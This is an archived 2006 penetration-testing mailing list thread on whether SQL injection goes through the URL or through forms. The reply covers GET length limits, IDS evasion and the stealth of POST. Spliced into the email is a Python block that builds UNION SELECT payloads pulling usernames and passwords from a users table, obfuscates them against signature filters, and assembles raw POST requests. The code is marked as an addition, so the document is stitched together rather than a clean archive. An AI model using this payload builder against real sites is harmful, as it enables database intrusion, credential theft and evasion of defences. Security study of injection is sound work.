Penetration Testing mailing list archives

RE: sql injection: url or form based?


From: "LAROUCHE Francois" <Francois.LAROUCHE () consulting-for accor com>
Date: Mon, 13 Feb 2006 17:10:07 +0100

Hi Johnny,

I think you've got the essentials of the differences from the previous answers.

But one was missing: the limit on the size of the GET (about 2083 for IE, if I recall correctly). Some URLs are REALLY long 
by themselves, without any SQL injection, and if you find a UNION injection that needs, let's say, 60 values AND you 
need to encode each character and add comments between words to evade IDSes, reverse proxies or filters, then you can 
easily go beyond the URL limit for the given web server. Or when you want to create a new function or stored 
procedure on the attacked SQL server, you need space as well. 

Don't laugh. It happened to me a couple of times...

POST has no limit.

Personally, I prefer POST. Especially over HTTPS, it's a nice way to be really stealthy :) And besides, programmers are 
much lazier when it comes to checking values from hidden or select HTML tags; they think that since it's "hidden" it cannot 
be tampered with.

Cheers!

François Larouche
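The arithmetic behind the GET-length point above, as an added example that is not part of the original post or of any tool it mentions. It builds a padded UNION SELECT, applies the two evasion tricks named in the reply (inline comments between words and percent-encoding every character), measures the resulting URL against the 2083-character IE limit quoted in the thread, and falls back to a POST body once the GET no longer fits. The host, path, parameter names and the long catalogue base URL are constructed for illustration only.

```python
# Added example (not from the original post). Shows how quickly an obfuscated
# UNION payload outgrows a GET URL and what the same request looks like as a POST.
# BASE_URL, the "id" parameter and the "users" table are made-up sample values.
import urllib.parse

IE_URL_LIMIT = 2083  # URL length limit for Internet Explorer, as cited in the thread

# Constructed sample: a catalogue URL that is already long before any injection.
BASE_URL = ("http://shop.example.test/catalog/results.aspx?category=12"
            "&subcategory=7&sort=price_asc&page=3"
            "&sessionid=3f1c9b7e2a5d4c8e9b0a1f2e3d4c5b6a&ref=newsletter_2006_02")


def union_payload(num_columns, table="users", fields=("username", "password")):
    """Build a UNION SELECT padded with NULLs so the column count matches.

    The leading quote closes the string literal the injected value lands in;
    the trailing "-- " comments out whatever the application appends.
    """
    if num_columns < len(fields):
        raise ValueError("need at least %d columns" % len(fields))
    slots = list(fields) + ["NULL"] * (num_columns - len(fields))
    return "' UNION SELECT " + ",".join(slots) + " FROM " + table + "-- "


def obfuscate(payload):
    """Replace every space with an inline comment, the evasion trick from the post.

    MySQL and MSSQL treat /**/ as whitespace, so the query still parses, but a
    signature keyed on "UNION SELECT" with a plain space no longer matches.
    The space after "--" is restored because MySQL requires it.
    """
    return payload.rstrip().replace(" ", "/**/") + " "


def encode_every_char(text):
    """Percent-encode every byte, not only the reserved ones (triples the size)."""
    return "".join("%%%02X" % b for b in text.encode("utf-8"))


def get_url(base, param, value):
    """Append an already-encoded value to a base URL that may have other parameters."""
    sep = "&" if "?" in base else "?"
    return base + sep + param + "=" + value


def choose_method(num_columns, base=BASE_URL, param="id", limit=IE_URL_LIMIT):
    """("GET", url_length) if the encoded payload fits the limit, else ("POST", body_length)."""
    payload = obfuscate(union_payload(num_columns))
    url = get_url(base, param, encode_every_char(payload))
    if len(url) <= limit:
        return "GET", len(url)
    # Over the limit: the same payload rides in a form-encoded POST body, so the
    # request line stays short. Body limits exist too, but are usually megabytes.
    body = urllib.parse.urlencode({param: payload})
    return "POST", len(body)


def max_columns_for_get(base=BASE_URL, param="id", limit=IE_URL_LIMIT):
    """Largest column count whose encoded, obfuscated payload still fits in a GET."""
    n = 2
    while choose_method(n + 1, base, param, limit)[0] == "GET":
        n += 1
    return n


def post_request(num_columns, base=BASE_URL, param="id"):
    """Raw HTTP/1.0 request text for the POST variant (built, not sent anywhere)."""
    parts = urllib.parse.urlsplit(base)
    target = parts.path + ("?" + parts.query if parts.query else "")
    body = urllib.parse.urlencode({param: obfuscate(union_payload(num_columns))})
    return ("POST %s HTTP/1.0\r\nHost: %s\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            "Content-Length: %d\r\n\r\n%s" % (target, parts.netloc, len(body), body))


if __name__ == "__main__":
    for n in (10, 60, 117, 118):
        print(n, "columns ->", choose_method(n))
    print("largest UNION that still fits in a GET:", max_columns_for_get(), "columns")
```

With this sample base URL a 60-column UNION still fits (1216 characters), but every extra column costs 15 encoded characters, so the GET overflows at 118 columns; a longer base URL or heavier encoding moves that point lower.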

-----Original Message-----
From: johnny Mnemonic [mailto:security4thefainthearted () hotmail com] 
Sent: Friday, February 10, 2006 7:07 AM
To: pen-test () securityfocus com
Subject: sql injection: url or form based? 

I see many references to manipulation of SQL backend databases through both URL-based and form-based SQL injection, but 
I'm wondering what the essential differences between the two methods are and when to use one over the other.
Thanks.



------------------------------------------------------------------------------
Audit your website security with Acunetix Web Vulnerability Scanner: 

Hackers are concentrating their efforts on attacking applications on your website. Up to 75% of cyber attacks are 
launched on shopping carts, forms, login pages, dynamic content etc. Firewalls, SSL and locked-down servers are 
futile against web application hacking. Check your website for vulnerabilities 
to SQL injection, Cross site scripting and other web attacks before hackers do! 
Download Trial at:

http://www.securityfocus.com/sponsor/pen-test_050831
-------------------------------------------------------------------------------



This e-mail, any attachments and the information contained therein ("this message") are confidential and intended 
solely for the use of the addressee(s). If you have received this message in error please send it back to the sender 
and delete it. Unauthorized publication, use, dissemination or disclosure of this message, either in whole or in part 
is strictly prohibited.



